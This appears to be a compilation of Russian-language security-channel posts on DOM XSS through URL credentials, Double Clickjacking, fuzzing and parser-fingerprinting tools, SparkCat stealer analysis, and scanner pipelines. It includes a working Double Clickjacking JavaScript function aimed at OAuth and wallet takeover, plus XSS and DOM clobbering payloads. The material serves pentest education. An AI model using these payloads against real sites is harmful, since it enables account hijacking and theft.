Concealing payloads in URL credentials

1. Несоответствие между document.URL и location:

// При URL https://foo:[email protected]
console.log(location);        // выведет: https://portswigger-labs.net/
console.log(document.URL);    // выведет: https://foo:[email protected]/

Это создаёт ситуацию когда разработчики часто считают эти значения идентичными и могут использовать неправильное свойство в коде

2. DOM XSS через credentials:

// Уязвимый код на сайте
function getBase(url) {
   return url.split(/[?#]/)[0];  // Удаляет query параметры и hash
}
document.write(`<script>const url='${getBase(document.URL)}';</script>`);

// Эксплуатация (в Firefox):
// https://'-alert(1)-'@example.com

Даже если сайт очищает URL от query-параметров и hash части, можно внедрить JavaScript код через credentials часть.

3. DOM Clobbering через credentials:

// URL: https://user:[email protected]
<a href id=x>test</a>
<script>
eval(x.username) // выполнит код 'user'
eval(x.password) // выполнит код 'pass'
</script>

Это приводит к возможности контролировать свойства username/password у HTML элементов, что может привести к DOM Clobbering атакам.

Где применимо:

1. Обход фильтрации:
- Многие WAF и защитные механизмы не проверяют credentials часть URL
- Payload можно "спрятать" так, что он не будет виден в адресной строке
- В Firefox одинарные кавычки не кодируются в credentials части

2. Persistent XSS:
- Если сайт сохраняет document.URL в базу данных
- Если значение позже отображается другим пользователям
- Если значение используется в JavaScript коде

3. DOM Clobbering:
- Возможность влиять на свойства HTML элементов
- Потенциальное влияние на работу JavaScript библиотек
- Возможность обхода некоторых CSP правил

Но:
- Работает только в Chrome и Firefox
- Safari полностью отбрасывает credentials
- Chrome блокирует использование credentials для суб-ресурсов

Потыкал brainstorm от Invicti Security - это фаззер который комбинирует классический ffuf с локальными LLM для "умной" генерации путей.

Тестировал на нескольких проектах, включая один большой Java-бэкенд. Суть работы такая: инструмент сначала собирает существующие эндпоинты с сайта, затем скармливает их в LLM (я использую mistral - показывает себя отлично на этой задаче), который на их основе генерирует предполагаемые пути. Дальше эти пути проверяются через ffuf, найденные валидные эндпоинты снова отправляются в LLM для следующей итерации генерации.

На тестовом проекте результаты были неплохие: нашел 15 новых эндпоинтов всего за ~400 запросов. Для сравнения - классический ffuf с большим вордлистом jsp.txt (100k записей) нашел только 6 эндпоинтов. Ключевое преимущество - фаззер делает запросы не пачкой, а небольшими партиями между итерациями с LLM, что помогает избежать блокировок.

Интересно, что многие найденные пути были логически связаны с изначальными эндпоинтами - например, от /api/v1/users генерились /api/v1/users/{profile|settings|notifications}. LLM довольно умно подхватывает паттерны именования.

Из личного опыта (довольно небольшого, учитывая что сам узнал про утилиту недавно) - работает заметно эффективнее на проектах с "говорящими" URL и RESTful API, чем на legacy системах с непрозрачными путями.

Проект opensource: github.com/Invicti-Security/brainstorm​​​​​​​​​​​​​​​​

Для себя буду дорабатывать и переделывать для массовости, проксирования и так далее, интересных мне фич.

да, кстати... память течёт. Андрею спасибо за напоминание))

HTML Universal Identifier
На VK Security Confab анонсировал свою тулзу для идентификации Html
Вот собственно и она:
https://github.com/Slonser/hui
Что можно делать сейчас:
- Идентифицировать flattening
- Находить неправильный mutation payloads
- Смотреть на разрешенные атрибуты и теги
- Идентифицировать библиотеку которая работает с html на бекенде
Нужно ещё много доработать но можно пользоваться уже сейчас
P.S. массово прописываем

python -m pip install hui

Утилита hui

Интересный (на первый взгляд. еще не тестил сам) инструмент - Html Universal Identifier. Основная задача - определение серверных HTML-парсеров и их особенностей.

Что умеет:
- Определяет разрешенные HTML, SVG и MathML теги
- Находит разрешенные атрибуты
- Выявляет некорректности в парсинге HTML
- Определяет используемый парсер на бэкенде

Поддерживает популярные парсеры:
• JS: DOMpurify, JSDOM, sanitize_html
• Python: html, lxml, html_sanitizer
• Go: net/html, bluemonday

Для пентустеров полезна при:
• Поиске обходов XSS-фильтров
• Анализе санитайзеров
• Обходе WAF
• Fingerprinting бэкенд-технологий

GitHub: https://github.com/Slonser/hui

Double Clickjacking: техника обхода защиты от UI Redressing

Атака эксплуатирует разницу во времени между событиями mousedown и onclick при двойном клике, позволяя обходить:
- SameSite=Lax/Strict
- X-Frame-Options
- CSP frame-ancestors

Почему это работает:
1. Страница открывает новое окно
2. Окно меняет location родительского окна через window.opener на целевую страницу (OAuth, настройки и т.д.)
3. При double-click первый mousedown закрывает верхнее окно, второй клик попадает на кнопку в родительском окне

Как это может быть реализованно:

function openDoubleWindow(url, top, left, width, height) {
    var evilWindow = window.open(window.location.protocol + "//" +
        window.location.hostname + ":" +
        window.location.port + "/random", "_blank");

    evilWindow.onload = function() {
        evilWindow.document.write(`
            <script>
            setTimeout(() => opener.location = "${url}", 1000);
            </script>
            <div id="doubleclick" 
                style="position: absolute; top: ${top}px; left: ${left}px;">
                Double Click Here
            </div>
            <script>
            document.getElementById('doubleclick')
                .addEventListener('mousedown', () => window.close());
            </script>`);
    };
}

Некоторые особенности:
- mousedown срабатывает быстрее click на 10-15мс
- Event.isTrusted не защищает от атаки
- Работает в Chrome, Firefox, Safari
- Можно открывать окно поверх всего браузера
- Атака успешна даже при медленном double-click
- Таймаут в 1000мс компенсирует разницу в скорости браузеров
- При использовании window.open не срабатывает защита от popunder
- OAuth токены можно получить до того, как пользователь заметит изменения

Применить можно например при:
1. OAuth с максимальными правами
2. Смена настроек безопасности
3. Подтверждение транзакций
4. Атаки на расширения Chrome/Firefox
5. Web3 авторизация dApps
6. Отключение VPN
7. Mobile DoubleTap атаки

При атаке на браузерные расширения через window.open можно скрыть URL, запросы и изменения в родительском окне. Это делает атаку почти незаметной для пользователя.

Salesforce Account Takeover via Doubleclick

Slack OAuth takeover via Doubleclick

Metamask - DoubleClickjacking Wallet Takeover

В этом выступлении на DEF CON 32 Джозеф Кокс, автор книги «Dark Wire» и соучредитель 404 Media, рассказывает о секретной операции ФБР под названием «Anom», рамках которой ФБР управляло компанией по производству зашифрованных телефонов Anom, которая продавала устройства преступным организациям по всему миру.

Основные интересные моменты:

- Anom продавала модифицированные телефоны Android (Google Pixel, Samsung) с удаленными микрофонами, камерами и GPS, а также с предустановленным приложением для обмена зашифрованными сообщениями.
- ФБР внедрило бэкдор в приложение Anom, который позволял им перехватывать и читать все сообщения, отправляемые через платформу.
- Anom использовалась преступными организациями в более чем 100 странах, что позволило ФБР получить доступ к огромному количеству информации о преступной деятельности.
- ФБР сотрудничало с правоохранительными органами других стран, предоставляя им доступ к перехваченным сообщениям.
- Операция Anom была значительно расширена после закрытия конкурирующей компании Sky ECC, которая также предоставляла зашифрованные телефоны преступникам.

Операция вызвала серьезные вопросы о конфиденциальности и этичности использования бэкдоров правоохранительными органами.

Как вы считаете имеет ли место быть такого рода деятельность?

Интересный разбор кроссплатформенного OCR-стилера криптокошельков SparkCat

Как я понял, с помощью атаки на цепочку поставок SparkCat проник как в Google Play (>242k установок), так и в App Store (первый известный случай OCR-стилера в официальном магазине Apple).

Реализован был как:
- Модульная система с вредоносным SDK/фреймворком
- Основной модуль написан на Java (Android) / Objective-C (iOS)
- Сетевое взаимодействие реализовано на Rust (редкий выбор для мобильных платформ)
- Использует Google ML Kit для OCR-распознавания

Механизм работы:
- Загружает конфигурацию с GitLab (зашифрована AES-128-CBC)
- Использует кастомный протокол поверх TCP для C2-коммуникации
- Шифрует:
* AES-256-CBC для данных
* AES-GCM-SIV для протокола
* RSA для обмена ключами
* ZSTD компрессия

Прикольно что он:
- Имеет три режима фильтрации OCR-результатов:
* По ключевым словам (мультиязычный словарь)
* По количеству слов определенной длины
* По локализованным словарям
- Маскируется под аналитический SDK (com.spark.stat)
- Запрашивает доступ к галерее при открытии чата поддержки

Эксфильтрация:
1) Проверка MD5 изображения на C2 (/api/e/img/uploadedCheck)
2) Загрузка в Amazon S3 или через rust-протокол
3) Отправка ссылки на C2 (/api/e/img/rekognition)

Он даже защищается:
- Обфускация через HikariLLVM (iOS)
- Шифрование строк и запутывание потока управления
- Маскировка C2 под легитимные сервисы (api.firebaseo[.]com)
- Минимальные следы вредоносной активности

Из интересного:
- Использует нестандартный nonce="unique nonce" для AES-GCM-SIV
- Содержит как клиентский, так и серверный Rust-код в iOS версии
- Поддерживает распознавание текста на латинице, китайском, корейском и японском
- Имеет неиспользуемый модуль для отслеживания геолокации

Это давно должно было случиться и вот пожалуйста.

Друзья, привет!

Хочу поделиться крутой новостью. Последний год мы работали над проектом, который, надеюсь, будет реально полезен для всего нашего комьюнити.

Запускаем @hackadvisor — платформу, где мы собрали информацию по популярным площадкам и публичным багбаунти-программам https://hackadvisor.io. Теперь каждый может поделиться своим опытом, оставить честный отзыв — будь то позитивный или негативный — и формировать независимый рейтинг на основе этих отзывов. Надеюсь, это станет толчком для компаний быть более честными и прозрачными по отношению к хакерам. Так у комьюнити будет больше понимания, какие программы адекватные, а к каким стоит присмотреться повнимательнее.

Мы также добавили возможность верификации для компаний. Это значит, что они смогут публично отвечать на отзывы, комментировать ситуации и показывать своё реальное отношение к багхантерам и безопасности в целом. Верим, что это важный шаг к открытому и честному диалогу между хакерами и компаниями.

Важно: любой хакер может оставить свой отзыв анонимно, просто указав случайный никнейм при регистрации. При этом, чтобы избежать накруток и буллинга программ, мы внедрили верификацию. Хакеру нужно будет подтвердить, что у него действительно есть учётная запись на выбранной площадке или в программе, о которой он оставляет отзыв. Хочу отдельно отметить, что эти данные остаются скрытыми и нигде не публикуются — анонимность и приватность для нас в приоритете.

И, конечно, не могу не сказать про людей, без которых этого всего бы не случилось.
Кто помогал на разных этапах — от идеи до запуска: @aosmanov @r0hack @kuduzow @bikmetle @murphyrol @lincode_x. Спасибо вам за поддержку и вклад в этот проект!

Конечно, в мире нет идеальных вещей, и мы прекрасно это понимаем. Поэтому будем активно дорабатывать платформу, внедрять новые возможности и прислушиваться к потребностям комьюнити. Ваша обратная связь и идеи помогут сделать Hackadvisor ещё полезнее для всех.

Будем рады вашей поддержке, обратной связи и, конечно, отзывам на самой платформе. Заходите, тестируйте, делитесь с друзьями — давайте вместе сделаем нашу сферу лучше!

Вторичная эксплуатация брошенной хакерской инфраструктуры

Исследователи WhoisXML API провели анализ вектора повторного использования брошенных, но все еще рабочих бэкдоров. Суть атаки в том, что вместо создания новой инфраструктуры хацкеры используют уже существующие бэкдоры и C2, оставленные другими злоумышленниками.

На основе 34 первичных доменов-индикаторов компрометации исследователи выявили масштабную инфраструктуру:
• 498 доменов, связанных по email
• 10 IP-адресов (8 подтверждены как вредоносные)
• 192 домена, связанных по IP-адресам
• 666 доменов, связанных по ключевым строкам

Технический анализ показал, что большинство доменов администрировалось через Stichting Registrar of Last Resort Foundation, а IP-инфраструктура распределена между Германией, Нидерландами, Россией и Сингапуром.

Источники:
1. Отчет "DNS Deep Dive: Peeking into Back Doors to Abandoned but Live Backdoors" - WhoisXML API
2. Исследование "Backdooring Your Backdoors" - watchTowr Labs

Популярные pipeline автоматизации от project discovery типа domain | sites | urls | vulns, которыми пользуются для быстрой оценки веба, упускают две важные вещи. Первая это конечно же POST-параметры, которые представляют собой более 50% поверхности атак. Оно и понятно, ведь тело запроса не передать через pipe так же просто как url.
Но несмотря на практически полный игнор POST-параметров (https://github.com/projectdiscovery/katana/issues/423 даже не планируют) katana и nuclei всё же можно заставить работать с ними.
Для katana даже если мы укажем -automatic-form-fill в выхлопе мы всё равно не увидим заветных параметров форм, но если мы сделаем json output то сможем получить то что нужно:
katana -u site.com -jsonl -or -ob | jq -r '.request.method,.request.endpoint,.request.body' | paste - - - | while read method url body; do ... done
С nuclei дела обстоят немного сложнее. На самом деле фаззинг-движок nuclei вполне способен итерироваться по POST-параметрам, но вот nuclei не предоставляет ни какого интерфейса для задания POST-параметров через опции командной строки. Однако nuclei принимает множество форматов для входных данных, не все он ещё хорошо умеет парсить, но вот через формат openapi мы вполне можем задать ему POST-запрос:
nuclei -im openapi -l <(./to_openapi.py 'POST' 'http://site.com/auth' 'user=a&pass=b') -dast -t dast/vulnerabilities
Наконец соединить katana и nuclei с поддержкой POST-параметров:

katana -u site.com -jsonl -or -ob | jq -r '.request.method,.request.endpoint,.request.body' | paste - - - | while read method url body; do
nuclei -im openapi -l <(./to_openapi.py "$method" "$url" "$body") -dast -t dast/vulnerabilities
done

И такая автоматизация уже по-взрослому начнёт искать веб-уязвимости.
Надеюсь что в будущем такие костыли будут не нужны и станет возможным более удобное использование (https://github.com/projectdiscovery/nuclei/issues/6011).

Второй, куда менее очевидный момент, который упускают автоматизаторы - это vhostы (когда на одном порту может быть сразу множество сайтов). И, важный момент, - ни кто не гарантирует, что будет связь между DNS и заголовком Host. Иногда админы убирают старые сайты удаляя просто DNS-запись, забывая при этом удалить сам сайт. И такая простая pipeline автоматизация как subfinder | httpx | katana уже не заметит такие сайты.
Искать фактические сайты на веб-серверах можно ffuf или gobuster (особенно после моего коммита https://github.com/OJ/gobuster/pull/249). И далее добавлять соответствие ip hostname в /etc/hosts. Но если говорить об автоматизации с этим подходом возникают сложности - при одновременном сканировании сразу множества сайтов (а на периметре их обычно десятки, сотни) наши скрипты будут мешать друг другу используя при этом единый файл hosts. Решение тут - это Linux namespace, позволяющий запустить любой процесс с персональными точками монтирования. И вот таким волшебным sheebang (https://piware.de/2012/12/running-a-script-with-unshared-mount-namespace/) в любом скрипте автоматизации #!/usr/bin/env -S sudo unshare -m sudo -u user bash мы можем запускать проверки внося изменения в hosts локально, не мешая другим скриптам. После чего автоматизация не пройдёт мимо даже скрытого (без dns) сайта.

Я конечно не как Слонсер. Книгами Андрея сильно не увлекался, но знаком с его трудом. И мне кажется правильным чтобы этот пост был и у меня на канале, у аудитории которой тоже может быть не безразлично, тем более что Андрей взамен обещает годный контент и просит поддержать его работу и труд. Мне конечно важнее чтобы человек дальше смог спокойно жить, победив эту болячку, но вдруг кому-то будет легче если он будет знать что взамен помощи финансовой получит какие-то знания.
Так что на сайте у него информация о том что у него в планах. Можете ознакомиться.

Пост не по теме канала, но то что мне показалось очень важным
Есть такой человек - Андрей Викторович Столяров
Для тех кто не знал или забыл - он автор наверное одних из лучших книг по программированию на русском языке
Будучи ещё в школе я с радостью прочитал его книги
Сейчас узнал, что в потоке информационного шума пропустил очень важную новость - у него, к сожалению, обнаружили рак...
http://stolyarov.info/node/429

Пост я делаю не с целью обратить внимания или что-то вроде такого, а просто чтобы если кто-то вдруг как и я читал его книги (которые всегда были в бесплатном доступе) - не упустил сказать спасибо ему за все монетой.